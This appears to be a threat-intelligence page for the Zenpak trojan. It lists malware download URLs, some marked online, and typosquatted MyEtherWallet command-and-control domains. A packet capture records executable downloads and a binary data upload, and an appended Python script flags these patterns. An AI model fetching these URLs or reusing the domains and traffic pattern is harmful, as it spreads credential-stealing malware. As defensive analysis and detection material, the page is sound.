Zenpak Trojan Malware PCAP File Download Traffic Sample myehterwallet.top


Download attachments

  • pcap updatewallet (6 MB), added February 10, 2020 1:16 am by admin
Date added (UTC)      Malware URL                              Status   Tags  Reporter
2020-02-08 16:42:22   http://45.141.86.18/files/dzjitNh.exe    Online   exe   @abuse_ch
2020-02-08 16:42:18   http://45.141.86.18/files/QWwiylX.exe    Offline  exe   @abuse_ch
2020-02-08 16:42:12   http://45.141.86.18/files/KplagwO.exe    Offline  exe   @abuse_ch
2020-02-08 16:42:03   http://45.141.86.18/files/IDRHHqr.exe    Online   exe   @abuse_ch

What can the Trojan.Win32.Zenpak.usq virus do?

  • Executable code extraction
  • Attempts to connect to a dead IP:Port (1 unique times)
  • Creates RWX memory
  • Expresses interest in specific running processes
  • A process created a hidden window
  • HTTP traffic contains suspicious features which may be indicative of malware related traffic
  • Performs some HTTP requests
  • Unconventional language used in binary resources: Sindhi
  • The binary likely contains encrypted or compressed data.
  • Uses Windows utilities for basic functionality
  • Attempts to repeatedly call a single API many times in order to delay analysis time
  • Steals private information from local Internet browsers
  • Collects information about installed applications
  • Attempts to access Bitcoin/ALTCoin wallets
  • Harvests credentials from local FTP client software
  • Harvests information related to installed instant messenger clients
  • Harvests information related to installed mail clients
  • Collects information to fingerprint the system
  • Uses suspicious command line tools or Windows utilities

Related domains:

z.whorecord.xyz
a.tomx.xyz
myetherwalet.top
myehterwallet.top

2020-02-08 20:05:37.803086 IP 192.168.86.25.56286 > 45.141.86.139.80: Flags [P.], seq 2191070756:2191071275, ack 3720491098, win 16425, length 519: HTTP: GET /update/updatewallet.exe HTTP/1.1
GET /update/updatewallet.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=106272-
Unless-Modified-Since: Sun, 09 Feb 2020 01:00:02 GMT
If-Range: "45400-59e1a24828f58"
Host: 45.141.86.139
Connection: Keep-Alive

2020-02-08 20:06:16.382474 IP 192.168.86.25.56287 > 47.252.10.241.80: Flags [P.], seq 2454723221:2454723288, ack 936642715, win 16425, length 67: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Connection: Keep-Alive
Host: myehterwallet.top

2020-02-08 20:06:16.693132 IP 192.168.86.25.56288 > 47.252.10.241.80: Flags [P.], seq 150158847:150158988, ack 1965259756, win 16425, length 141: HTTP: GET /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
GET /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: myehterwallet.top

2020-02-08 20:06:17.180098 IP 47.252.10.241.80 > 192.168.86.25.56288: Flags [P.], seq 1:687, ack 141, win 473, length 686: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:07:05 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

1dc
mewak5bZKCuA6r9kYczc1/Pfc72ek1lz0pz5X8NprUwRMgktR+fSAHTNsERAgroi/LUEECvxC2ORcVpPqS9hIF1sopmqWfSBYv3Cnhal1rzhf2M9djiZ4QkgKOHvhfuD7VVQoiZScbgHJL3uTywWOAMg/ItYHRrvcrU3aJ+22eGOoZawPhkj1T0hCcqpimreS9n0fZ5UVMlHBvNApSToQEbwUGiT9VnbqphjOBjZNzaciNK21oVaTacTcg4IWIvpkKaIUHpJ5QJ1ms2FzPz4O+JniA2W/O20GyxrVB+alU/Zu4+8KFueQOZCWp3+YtKKr0YNnK9n3jeeR/HsU2tmUUEFUuqU/WHnpNNgMKLytvFhsCzIgvaYrIsW27YmG0DMki7SyWQFABNnBrBMWQKbtSDWN68tJCqWXbooHDETteZydsHNOpsLvJMbdrXgP3LCsOqmw2OXW3QTYq0TxOpB1hIy+Q==
0

2020-02-08 20:06:18.267343 IP 192.168.86.25.56289 > 47.252.10.241.80: Flags [P.], seq 1029859406:1029859588, ack 1948574692, win 16425, length 182: HTTP: POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Content-Encoding: binary
Host: myehterwallet.top
Content-Length: 84067

2020-02-08 20:06:18.388116 IP 192.168.86.25.56289 > 47.252.10.241.80: Flags [P.], seq 79022:84249, ack 1, win 16425, length 5227: HTTP
[binary POST body continues: application/octet-stream, Content-Length 84067; not reproducible as text]
2020-02-08 20:06:19.685747 IP 47.252.10.241.80 > 192.168.86.25.56289: Flags [P.], seq 1:169, ack 84249, win 2390, length 168: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sun, 09 Feb 2020 01:07:06 GMT
Server: Apache/2.4.25 (Debian)
Content-Length: 2
Connection: close
Content-Type: text/html; charset=UTF-8

OK
2020-02-08 20:06:57.769720 IP 192.168.86.25.56290 > 45.141.86.18.80: Flags [P.], seq 4100635938:4100636341, ack 801110070, win 16425, length 403: HTTP: GET /files/zbJTJNs.exe HTTP/1.1
GET /files/zbJTJNs.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive

2020-02-08 20:09:06.075785 IP 192.168.86.25.56293 > 45.141.86.18.80: Flags [P.], seq 2008031888:2008032291, ack 1820992094, win 16425, length 403: HTTP: GET /files/bcLgQFf.exe HTTP/1.1
GET /files/bcLgQFf.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive

2020-02-08 20:13:59.060517 IP 192.168.86.25.56311 > 45.141.86.18.80: Flags [P.], seq 1506290374:1506290777, ack 1695482312, win 16425, length 403: HTTP: GET /files/IDRHHqr.exe HTTP/1.1
GET /files/IDRHHqr.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: 45.141.86.18
Connection: Keep-Alive

2020-02-08 20:24:26.726136 IP 45.141.86.18.80 > 192.168.86.25.56290: Flags [P.], seq 4234001:4235461, ack 403, win 237, length 1460: HTTP
[binary response body: first 1460-byte segment of the /files/zbJTJNs.exe download (reply to the GET on port 56290); not reproducible as text]
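As an added example (not code from the original post, the sample's uploader, or any tool the page mentions), the following Python parses tcpdump-style HTTP request text like the capture above into request records and raises the three observations a defender would pull from this traffic: an executable fetched from a host given as a bare IP literal, a Host label within edit distance 2 of a protected brand name (the watch-list containing only "myetherwallet" is an assumption), and a large application/octet-stream POST to a script endpoint, as seen with the 84067-byte upload to conf.php. The embedded transcript is abridged from this page's capture with the raw header bytes and seq/ack fields removed.

```python
import re
from dataclasses import dataclass, field

# Transcript abridged from the tcpdump -A capture on this page: summary line,
# then the HTTP request line and headers (raw header bytes dropped).
# Packets are separated by one blank line.
SAMPLE = """\
2020-02-08 20:05:37.803086 IP 192.168.86.25.56286 > 45.141.86.139.80: Flags [P.], length 519: HTTP: GET /update/updatewallet.exe HTTP/1.1
GET /update/updatewallet.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Range: bytes=106272-
Host: 45.141.86.139
Connection: Keep-Alive

2020-02-08 20:06:16.382474 IP 192.168.86.25.56287 > 47.252.10.241.80: Flags [P.], length 67: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Connection: Keep-Alive
Host: myehterwallet.top

2020-02-08 20:06:18.267343 IP 192.168.86.25.56289 > 47.252.10.241.80: Flags [P.], length 182: HTTP: POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
POST /UJZfOVD59Rue1AtQ/conf.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
Content-Encoding: binary
Host: myehterwallet.top
Content-Length: 84067

2020-02-08 20:06:57.769720 IP 192.168.86.25.56290 > 45.141.86.18.80: Flags [P.], length 403: HTTP: GET /files/zbJTJNs.exe HTTP/1.1
GET /files/zbJTJNs.exe HTTP/1.1
Host: 45.141.86.18
Connection: Keep-Alive
"""

SUMMARY = re.compile(r"^(?P<ts>\S+ \S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+):")
REQUEST = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Assumption: brand names the defender wants lookalike hosts flagged against.
PROTECTED_BRANDS = ("myetherwallet",)


@dataclass
class Request:
    ts: str
    src: str
    dst: str
    method: str
    path: str
    headers: dict = field(default_factory=dict)


def parse_transcript(text):
    """Turn blank-line-separated tcpdump packets into Request records (requests only)."""
    requests = []
    for block in text.strip().split("\n\n"):
        lines = block.splitlines()
        m = SUMMARY.match(lines[0])
        if not m:
            continue
        req = None
        for line in lines[1:]:
            r = REQUEST.match(line)
            if r and req is None:
                req = Request(m["ts"], m["src"], m["dst"], r["method"], r["path"])
                continue
            if req is not None and ": " in line:
                name, _, value = line.partition(": ")
                req.headers[name.lower()] = value.strip()   # header names are case-insensitive
        if req is not None:
            requests.append(req)
    return requests


def levenshtein(a, b):
    """Plain edit distance; a transposition such as 'eh'/'he' costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_alerts(requests, octet_threshold=10_000):
    """Return (timestamp, kind, detail) tuples for the three patterns seen in this capture."""
    alerts = []
    for r in requests:
        host = r.headers.get("host", "")
        # 1. Executable downloaded from a server addressed by IP literal, no domain at all.
        if IP_LITERAL.match(host) and r.path.lower().endswith(".exe"):
            alerts.append((r.ts, "exe-from-ip-literal", f"{r.src} -> http://{host}{r.path}"))
        # 2. Leftmost label close to a protected brand (for real traffic use a
        #    public-suffix-aware registrable-domain extraction instead of split()).
        label = host.split(".")[0]
        for brand in PROTECTED_BRANDS:
            d = levenshtein(label, brand)
            if 0 < d <= 2:
                alerts.append((r.ts, "lookalike-domain", f"{host} ~ {brand} (distance {d})"))
        # 3. Bulk opaque upload to a script endpoint, the shape of the conf.php POST above.
        ctype = r.headers.get("content-type", "")
        clen = int(r.headers.get("content-length", "0") or 0)
        if r.method == "POST" and ctype == "application/octet-stream" and clen >= octet_threshold:
            alerts.append((r.ts, "bulk-binary-post", f"{r.src} -> {host}{r.path} ({clen} bytes)"))
    return alerts


if __name__ == "__main__":
    for ts, kind, detail in find_alerts(parse_transcript(SAMPLE)):
        print(ts, kind, detail)
```

Run against the embedded transcript it reports two executable downloads from IP-literal hosts, two lookalike-domain hits for myehterwallet.top and one bulk binary POST; the distance threshold of 2 also catches the page's other related domain myetherwalet.top (one dropped letter), while the legitimate label itself scores 0 and is deliberately not flagged.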

Written by admin